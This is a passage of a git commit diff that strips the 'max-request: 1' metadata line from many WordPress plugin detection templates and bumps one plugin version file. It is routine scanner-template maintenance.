 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt
index 0704e8968e..8a359c4d49 100644
--- a/helpers/wordpress/plugins/so-widgets-bundle.txt
+++ b/helpers/wordpress/plugins/so-widgets-bundle.txt
@@ -1 +1 @@
-1.55.0
\ No newline at end of file
+1.55.1
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
